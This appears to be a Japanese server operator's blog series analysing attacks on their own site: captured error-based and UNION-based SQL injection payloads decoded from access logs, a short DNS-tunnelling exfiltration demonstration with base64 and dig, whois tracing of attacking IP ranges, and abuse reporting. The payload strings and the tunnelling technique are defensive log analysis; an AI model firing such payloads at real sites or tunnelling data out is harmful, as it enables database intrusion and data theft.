ブログ

エラーベースSQLインジェクション（Error-Based SQL Injection）の形跡

2026-03-24T18:24:07+09:00

　毎日，SQL Injectionを狙われた攻撃を受けているのだけど，今回は件数が多過ぎた．

　この場合１時間以内で4034件も１つのアドレスから行われてる．
　検出プログラムがバグった？ので，SQL文がついてきてたので，デコードしてみた．

　でコードできたけど，SQL文の一部だけだったので，Google Geminiに尋ねてみた．

　以下，全文．引用：

Q:
　次のようなSQLはどのようなアタックですか?SELECT/**/(ELT(2836=2836,1))),0x50636159,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.PLUGINS/**/GROUP/**/BY/**/x)a)/**/AND/**/"pH02"/**/LIKE/**/"pH02 &offset=72 1 900]

A:
　提示されたSQLは、MySQLなどのデータベースを標的としたエラーベースSQLインジェクション（Error-Based SQL Injection）と呼ばれる攻撃手法です。

　この攻撃の主な目的は、意図的にデータベースエラーを発生させ、そのエラーメッセージの中にデータベースの内部情報（バージョン、ユーザー名、テーブル構造など）を含ませて、攻撃者に情報を漏洩させることにあります。

攻撃の特徴と仕組み
　このSQL文には、エラーベース攻撃に典型的な以下の特徴が含まれています：

重複キーエラーの誘発:
　 FLOOR(RAND(0)*2) と GROUP BY を組み合わせる手法は、MySQLにおいて「Duplicate entry」エラーを意図的に引き起こす有名なテクニックです。
　情報の埋め込み: ELT(2836=2836, 1) や 0x50636159（16進数文字列）などの関数・値を使用し、エラーメッセージの中に特定の文字列や実行結果を表示させようとしています。

システム情報の参照:
　INFORMATION_SCHEMA.PLUGINS などのシステムカタログ（メタデータ）を参照することで、稼働しているプラグインやデータベースの構成情報を探っています。

WAFの回避:
　/**/ というコメントアウトを多用して単語を区切るのは、Webアプリケーションファイアウォール（WAF）による検知をかいくぐるための典型的な手法です。

影響とリスク
　この攻撃が成功すると、攻撃者は画面に表示されたエラーメッセージから以下のような情報を取得できる可能性があります：

・データベースのバージョン情報
・テーブル名やカラム名
・データベースのユーザー名
・設定状況やインストールされているプラグイン情報

　このようなリクエストがログに残っている場合、SQLインジェクションの脆弱性を探るスキャンや攻撃試行が行われたことを示しています。対策としては、プレースホルダを利用した安全なクエリ実装や、エラーメッセージをユーザーに直接表示させない設定が重要です。

　IPアドレスを調べると，166.93.236.35.bc.googleusercontent.comとGoogleのクラウドサービスなので，以下のフォームから通報してみた．

Report suspected abuse on Google Cloud Platform
https://support.google.com/code/contact/cloud_platform_report?hl=en

　結果，次のように．

引用：

Thanks for your request. We'll only follow up with you if we need additional information; please ensure your mail/spam filters accept mail from @google.com addresses. Requests are typically handled within a week.

ご依頼ありがとうございます。追加情報が必要な場合のみご連絡いたしますので、メールフィルターまたはスパムフィルターで@google.comのアドレスからのメールを受信できるように設定してください。ご依頼は通常1週間以内に処理されます。

　１週間以内か．．．進捗があったらここに掲載．

　ちなみに，うちでは数日前にブロックしているけど，まだ攻撃は続いている模様．

DNSトンネリング

2024-05-28T13:34:50+09:00

　DNSトンネリングの実演はこんな感じ．

　送信したい秘密のデータが"HELLO"だとして，それを一見わからないように暗号化．今回の場合はbase64でエンコード．

$ echo HELLO |base64🆑
SEVMTE8K
$

　エンコードしたデータをホスト部としてDNSルックアップする．

$ dig SEVMTE8K.google.com🆑

; <<>> DiG 9.10.6 <<>> SEVMTE8K.google.com
;; global options: +cmd
;; Got answer:

;; QUESTION SECTION:
;SEVMTE8K.google.com.		IN	A🈁
$

　そんなホストは無いと返答がある．

　これでgoogle.comのDNSサーバには，SEVMTE8Kというホスト名を検索したというDNSログが残る．DNSクエリを送った対象サーバが悪のあるデータ収集サーバだったら．．．

　悪意のあるプログラムが，DNSリクエストに偽装してデータを送信することでセキュリティゲートウェイやツールでの検知を逃れるのがDNSトンネリング．

　よってよくわからない命名規則のホスト名になるSEVMTE8KSEVMTE8KSEVMTE8K.google.comとかの場合，セキュリティツールで検知するように動作する場合がある．
　クラウドサービスを使っていてサーバをオートスケールにしている場合，ホスト名はランダムでユニークなものが付与されて時としてSEVMTE8KSEVMTE8KSEVMTE8Kみたいなホスト名になるので，それが検知される場合がある．

　情報漏洩になる事象なのか，過検知なのかは，自動では判明しづらいが，セキュリティツールで検知したとしてもワーニング程度にしていることが多い．つまりアラートは通知されるけど通信は止めない．

ハッカーは秘密通信とファイアウォールのバイパスのために DNS トンネリングを悪用する
https://community.riskiq.com/article/7f0d7aa3

引用：

Palo Alto は、ハッカーが DNS トンネリングを秘密の通信方法として、また従来のセキュリティ対策を回避するためにどのように利用しているかについて説明します。

RobbytuProjectsからのSQLインジェクション攻撃

2023-11-10T12:26:37+09:00

　2008年から使っている某Webサーバのファンが唸りをあげているので調べたら，データベースのCPUが高負荷．
　Webアクセスログを調べると，SQLインジェクションを受けていました．

　フィンランドのヘルシンキ，パナマ，カナダ，Oracleが関係するFull-stack Software engineerと名乗るRobert de Vriesが設置したサイトが管理しているようになっている．勉強にしては手が混んでいるし素人クローラーでもなさそう．

　単純にSELECT文を発行したアクセスをログから抽出してみるとこんな感じ．

$ grep "SELECT" acc.log |awk '{print $1'}|sort|uniq -c|sort -r🆑
   1616 193.56.113.14
    986 193.56.113.69
    941 193.56.113.62
    765 193.56.113.7
    709 193.56.113.47
    679 193.56.113.52
    618 193.56.113.24
    592 193.56.113.34
    589 193.56.113.43
    546 193.56.113.29
    431 193.56.113.17
    422 193.56.113.39
$

　AbuseIPDBで調べると，素性はよろしくない．

　アクセスの多いIPアドレスからのリクエストパラメータを抽出．

$ grep "193.56.113.14" acc.log.1699488000 |head -n 5|awk '{print $7}'
index.php?page=%2D1756%20%27%29%20ORDER%20BY%2021%2D%2D
index.php?page=%2D2047%20%27%20UNION%20ALL%20SELECT%20NULL%20FROM%20DUAL%2D%2D
index.php?page=%2D8371%20%27%29%20UNION%20ALL%20SELECT%20NULL%20FROM%20DUAL%2D%2D
index.php?page=%2D9856%20%27%20UNION%20ALL%20SELECT%20CHR%2866%29%7C%7CCHR%2879%29
%7C%7CCHR%2871%29%7C%7CCHR%28100%29%7C%7CCHR%28114%29%7C%7CCHR%28117%29%7C%7CCHR
%2874%29%7C%7CCHR%28100%29%7C%7CCHR%2899%29%7C%7CCHR%2872%29%20FROM%20DUAL%2D%2D
index.php?page=%2D9456%20%27%29%20ORDER%20BY%201%2D%2D
$

　最初の１つをURLデコードするとこうなる．

%2D1756%20%27%29%20ORDER%20BY%2021%2D%2D
↓
-1756 ') ORDER BY 21--

page=%2D9856%20%27%20UNION%20ALL%20SELECT%20CHR%2866%29%7C%7CCHR%2879%29%7C%7CCHR%2871%29%
↓
page=-9856 ' UNION ALL SELECT CHR(66)||CHR(79)||CHR(71)%

　CHR()という関数があるけど，ASCIIコード表から可視化してみた．

CHR(66)|| →6
CHR(79)|| →O
CHR(71)|| →G
CHR(100)|| →d
CHR(114)|| →r
CHR(117)|| →u
CHR(74)|| →J
CHR(100)|| →d
CHR(99)|| →c
CHR(72)   →H
FROM DUAL--

↓

6oGdriKdcH

　ちょっとよくわからんな．DUAL表を使おうとしているのでOracleユーザを狙った攻撃か．

　ドメインを調べてみる．

$ whois robbytu.net🆑
   Domain Name: ROBBYTU.NET
   Registry Domain ID: 1558754632_DOMAIN_NET-VRSN
   Registrar WHOIS Server: whois.rrpproxy.net
   Registrar URL: http://www.key-systems.net
   Updated Date: 2023-06-11T07:31:55Z
   Creation Date: 2009-06-10T17:50:12Z 🈁
   Registry Expiry Date: 2024-06-10T17:50:12Z
   Registrar: Key-Systems GmbH
   Registrar IANA ID: 269
   Registrar Abuse Contact Email: abuse@key-systems.net
   Registrar Abuse Contact Phone: +49.68949396850
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Name Server: BAYAN.NS.CLOUDFLARE.COM
   Name Server: TANI.NS.CLOUDFLARE.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-11-10T03:23:03Z <<<

　2009年登録なので歴史はありそう．

　次にIPアドレスを調べてみる．

$ whois 193.56.113.14🆑
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See https://apps.db.ripe.net/docs/HTML-Terms-And-Conditions

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '193.56.113.0 - 193.56.113.255'

% Abuse contact for '193.56.113.0 - 193.56.113.255' is 'abuses@cyberzonehub.com'

inetnum:        193.56.113.0 - 193.56.113.255
netname:        CYBERZ-193-56-113-0
country:        FI
geoloc:         60.2214193 24.9847017
org:            ORG-CS768-RIPE
admin-c:        AR68231-RIPE
tech-c:         AR68231-RIPE
status:         ASSIGNED PA
remarks:        Geofeed https://geofeeds.cyberzonehub.com/geofeed.csv
mnt-by:         PREFIXBROKER-MNT
created:        2023-08-23T12:41:17Z🆑
last-modified:  2023-08-23T12:41:17Z
source:         RIPE

organisation:   ORG-CS768-RIPE
org-name:       Cyberzone S.A.
org-type:       OTHER
address:        PH Bay Mall, Third Floor, Bella Vista
address:        NA Panama City
address:        Panama
abuse-c:        AR68231-RIPE
mnt-ref:        PREFIXBROKER-MNT
mnt-by:         PREFIXBROKER-MNT
created:        2022-12-07T10:21:58Z
last-modified:  2023-08-23T08:02:07Z
source:         RIPE # Filtered

role:           Abuse-C Role
address:        PANAMA
address:        Panama City
address:        0901
address:        PH Bay Mall, Third Floor, Bella Vista
abuse-mailbox:  abuses@cyberzonehub.com
nic-hdl:        AR68231-RIPE
mnt-by:         lir-pa-cyberzone-1-MNT
created:        2022-04-29T08:15:54Z
last-modified:  2022-04-29T08:15:55Z
source:         RIPE # Filtered

% Information related to '193.56.113.0/24AS209854'

route:          193.56.113.0/24
origin:         AS209854
mnt-by:         PREFIXBROKER-MNT
created:        2023-08-23T12:41:17Z
last-modified:  2023-08-23T12:41:17Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.108 (SHETLAND)


$

　2023年08月23日にパナマにあるCyberzone S.A.という会社が取得している模様．Cyberzoneで調べると

$ whois cyberzonehub.com🆑
   Domain Name: CYBERZONEHUB.COM
   Registry Domain ID: 2607139274_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.tucows.com
   Registrar URL: http://www.tucows.com 🈁カナダのレジストラの模様
   Updated Date: 2023-04-11T07:20:03Z
   Creation Date: 2021-04-23T13:00:34Z
   Registry Expiry Date: 2024-04-23T13:00:34Z
   Registrar: Tucows Domains Inc.
   Registrar IANA ID: 69
   Registrar Abuse Contact Email: domainabuse@tucows.com
   Registrar Abuse Contact Phone: +1.4165350123
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Name Server: ARYANNA.NS.CLOUDFLARE.COM
   Name Server: KENNETH.NS.CLOUDFLARE.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-11-10T04:18:56Z <<<

　このcyberzonehubという組織のWebサイトはありませんでした．まぁ素性はよろしくなさそう．

　攻撃元となっているRobbytuProjectsのサイトを見ると，１ページのシンプルな内容．

　翻訳するとこれ．

　このネット社会，爽やかな笑顔を晒すエンジニアがいるとは思えないので，ネットのフリー素材じゃ無いかと思って検索してみたけど，それっぽいものは見つからず．

　まずはGoogle Lens．

　検索結果はショッピングサイト中心のようで，Robert de Vriesなる人物が来ているシャツに似たものを売っているショッピングサイトばかり．

　次に，MicrosoftのBingで検索．

　検索結果が出てこなかった．

　次に，ロシアのYandexで検索．

　それっぽい顔写真がたくさん出てくるけど，同一な人は少ないかな．人間の特徴点は捉えているようだけど．

　そして範囲を顔部分に絞ってみた．

　特徴としては，笑顔の西洋人ばかり抽出されている感じ．

　こうしてみるとフリー素材では無いのかもしれないなぁ．

長時間SQLインジェクション攻撃を受けた - Havijが使われた件- その３　インドから

2022-04-11T01:17:09+09:00

　先週長時間SQLインジェクション攻撃を受けたのだけれど，また攻撃を受けた．

　手口は前回と同じHavijを使ったもの．

　execでcmd_shellでcatを実行してpasswdファイルを読み取ろうとしている．いわゆるパストラバーサル．

　AbuseIPDBで調べるとまた同時に共通点が１つ見つかりました．

　Microsoft Cloudを使っているようだが，今度はインドになっている．こういうのは通報窓口はあるのだろうか．

長時間SQLインジェクション攻撃を受けた - Havijが使われた件- その２

2022-04-08T17:21:02+09:00

　長時間SQLインジェクション攻撃を受けた件の続報．

　まず，攻撃をしてきていたMicrosoft Cloudが管理しているIPアドレスは，その後もSQLインジェクション報告が各国から相次いでいる模様．

　それでも100%ブラックには成らないのだなぁ．

　そしてトップルータのCPU使用率について考察．

　通常時よりは負荷がかかっていた様だけれど，単一セッションだったためかルータのDDoSになるほどでは無かった模様．
　逆にDBサーバの状態は深刻．

　接続によるスレッドの作成状況は少し増えた程度で変わりがないがテーブルロックが多発している．この辺りを鑑みて，アラートをあげるお手製の仕組みがあれば良いのかな．

ブログ

エラーベースSQLインジェクション（Error-Based SQL Injection）の形跡

DNSトンネリング

RobbytuProjectsからのSQLインジェクション攻撃

長時間SQLインジェクション攻撃を受けた - Havijが使われた件- その３ インドから

長時間SQLインジェクション攻撃を受けた - Havijが使われた件- その２

長時間SQLインジェクション攻撃を受けた - Havijが使われた件- その３　インドから